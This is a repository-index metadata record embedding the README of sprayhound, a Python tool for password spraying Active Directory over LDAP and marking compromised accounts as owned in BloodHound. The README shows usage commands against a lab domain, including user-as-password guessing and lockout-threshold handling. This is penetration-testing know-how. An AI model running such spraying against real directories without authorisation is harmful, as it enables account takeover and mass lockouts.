{"id":18864770,"url":"https://github.com/hackndo/sprayhound","last_synced_at":"2025-04-13T02:10:09.552Z","repository":{"id":41546099,"uuid":"238748349","full_name":"Hackndo/sprayhound","owner":"Hackndo","description":"Password spraying tool and Bloodhound integration","archived":false,"fork":false,"pushed_at":"2024-12-31T08:09:37.000Z","size":104,"stargazers_count":229,"open_issues_count":2,"forks_count":19,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-04-13T02:09:57.146Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Hackndo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-02-06T17:45:37.000Z","updated_at":"2025-03-21T01:59:43.000Z","dependencies_parsed_at":"2024-11-08T04:44:02.903Z","dependency_job_id":"fbc4188a-dd10-4e08-9527-2138f28476af","html_url":"https://github.com/Hackndo/sprayhound","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2Fsprayhound","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2Fsprayhound/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2Fsprayhound/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2Fsprayhound/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Hackndo","download_url":"https://codeload.github.com/Hackndo/s
prayhound/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248654090,"owners_count":21140236,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-08T04:43:59.319Z","updated_at":"2025-04-13T02:10:09.395Z","avatar_url":"https://github.com/Hackndo.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# SprayHound\n\n[![PyPI version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=py\u0026type=6\u0026v=0.0.4\u0026x2=0)](https://pypi.org/project/sprayhound/) [![Twitter](https://img.shields.io/twitter/follow/hackanddo?label=HackAndDo\u0026style=social)](https://twitter.com/intent/follow?screen_name=hackanddo)\n\n\n![Example](https://raw.githubusercontent.com/Hackndo/sprayhound/master/asssets/example.gif)\n\nPython library to safely password spray in Active Directory, set pwned users as owned in BloodHound and detect paths to Domain Admins.\n\n\nThis library uses the [ldap3](https://ldap3.readthedocs.io) project for all LDAP operations.\n\n| Chapters                                     | Description                                             |\n|----------------------------------------------|---------------------------------------------------------|\n| [Requirements](#requirements)                | Requirements to install sprayhound                      |\n| [Warning](#warning)                          | Before using this tool, read this                       |\n| [Installation](#installation)                | Installation instructions                               
|\n| [Usage](#usage)                              | Usage and command-line examples                         |\n\n## Requirements\n\n* Python \u003e= 3.6\n\n## Warning\n\nOnly the default domain policy is checked for now. If a custom GPO is used for the password policy, it won't be detected. This is a work in progress.\n\n\n## Installation\n\n### From pip\n\n```bash\npython3 -m pip install sprayhound\n```\n\n### From source\n\n```bash\nsudo apt-get install libsasl2-dev python3-dev libldap2-dev libssl-dev\ngit clone git@github.com:Hackndo/sprayhound.git\ncd sprayhound\npython3 setup.py install\n```\n\n## Usage\n\n### Parameters\n\n```bash\n$ sprayhound -h\n\nusage: sprayhound [-h] [-u USERNAME] [-U USERFILE]\n                  [-p PASSWORD | --lower | --upper] [-t THRESHOLD]\n                  [-dc DOMAIN_CONTROLLER] [-d DOMAIN] [-lP LDAP_PORT]\n                  [-lu LDAP_USER] [-lp LDAP_PASS] [-lssl]\n                  [-lpage LDAP_PAGE_SIZE] [-nh NEO4J_HOST] [-nP NEO4J_PORT]\n                  [-nu NEO4J_USER] [-np NEO4J_PASS] [--unsafe] [--force]\n                  [--nocolor] [-v]\n\nsprayhound v0.0.1 - Password spraying\n\noptional arguments:\n  -h, --help            show this help message and exit\n  --unsafe              Enable login tries on almost locked out accounts\n  --force               Do not prompt for user confirmation\n  --nocolor             Do not use color for output\n  -v                    Verbosity level (-v or -vv)\n\ncredentials:\n  -u USERNAME, --username USERNAME\n                        Username\n  -U USERFILE, --userfile USERFILE\n                        File containing username list\n  -p PASSWORD, --password PASSWORD\n                        Password\n  --lower               User as pass with lowercase password\n  --upper               User as pass with uppercase password\n  -t THRESHOLD, --threshold THRESHOLD\n                        Number of password left allowed before locked out\n\nldap:\n  -dc DOMAIN_CONTROLLER, --domain-controller 
DOMAIN_CONTROLLER\n                        Domain controller\n  -d DOMAIN, --domain DOMAIN\n                        Domain FQDN\n  -lP LDAP_PORT, --ldap-port LDAP_PORT\n                        LDAP Port\n  -lu LDAP_USER, --ldap-user LDAP_USER\n                        LDAP User\n  -lp LDAP_PASS, --ldap-pass LDAP_PASS\n                        LDAP Password\n  -lssl, --ldap-ssl     LDAP over TLS (ldaps)\n  -lpage LDAP_PAGE_SIZE, --ldap-page-size LDAP_PAGE_SIZE\n                        LDAP Paging size (Default: 200)\n\nneo4j:\n  -nh NEO4J_HOST, --neo4j-host NEO4J_HOST\n                        Neo4J Host (Default: 127.0.0.1)\n  -nP NEO4J_PORT, --neo4j-port NEO4J_PORT\n                        Neo4J Port (Default: 7687)\n  -nu NEO4J_USER, --neo4j-user NEO4J_USER\n                        Neo4J user (Default: neo4j)\n  -np NEO4J_PASS, --neo4j-pass NEO4J_PASS\n                        Neo4J password (Default: neo4j)\n```\n\n### Unauthenticated\n\nWhen used unauthenticated, **sprayhound** can't check password policies, so accounts could be locked out.\n\n```bash\n# Single user, single password\nsprayhound -u simba -p Pentest123.. -d hackn.lab -dc 10.10.10.1\n\n# User list, single password\nsprayhound -U ./users.txt -p Pentest123.. -d hackn.lab -dc 10.10.10.1\n\n# User as pass\nsprayhound -U ./users.txt -d hackn.lab -dc 10.10.10.1\n\n# User as pass with password lowercase\nsprayhound -U ./users.txt --lower -d hackn.lab -dc 10.10.10.1\n\n# User as pass with password uppercase\nsprayhound -U ./users.txt --upper -d hackn.lab -dc 10.10.10.1\n```\n\n### Authenticated\n\nWhen a valid domain account is provided, **sprayhound** will try to find the default domain policy and check the **badpwdcount** attribute of each user against the lockout threshold. Accounts whose count is too close to the threshold are skipped.\n\n```bash\n# Single user, single password\nsprayhound -u simba -p Pentest123.. -d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd\n\n# All domain users, single password\nsprayhound -p Pentest123.. 
-d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd\n\n# All domain users, single password, using an account from a trusted domain\nsprayhound -p Pentest123.. -d hackn.lab -dc 10.10.10.1 -lu 'babdcatha.net\\Babd' -lp P4ssw0rd\n\n# User as pass on all domain users\nsprayhound -d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd\n\n# User as pass with password lowercase\nsprayhound --lower -d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd\n\n# User as pass with password uppercase\nsprayhound --upper -d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd\n```\n\nThe margin kept between **badpwdcount** and the lockout threshold can be tuned with the `--threshold` parameter. If it is set to **2** and the password policy locks out accounts after 5 login failures, then **sprayhound** won't test users with a **badpwdcount** of 3 or more.\n\n```bash\nsprayhound -d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd --threshold 1\n```\n\n## BloodHound integration\n\nWhen **sprayhound** finds valid account credentials, it can mark those accounts as **Owned** in BloodHound. The BloodHound (Neo4j) connection details must be provided to the tool.\n\n```bash\n# -nh: Neo4J server\n# -nP: Neo4J port\n# -nu: Neo4J user\n# -np: Neo4J password\nsprayhound -d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd -nh 127.0.0.1 -nP 7687 -nu neo4j -np bloodhound\n```\n\n\n## Changelog\n\n```\nv0.0.2\n------\nFirst release\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackndo%2Fsprayhound","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackndo%2Fsprayhound","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackndo%2Fsprayhound/lists"}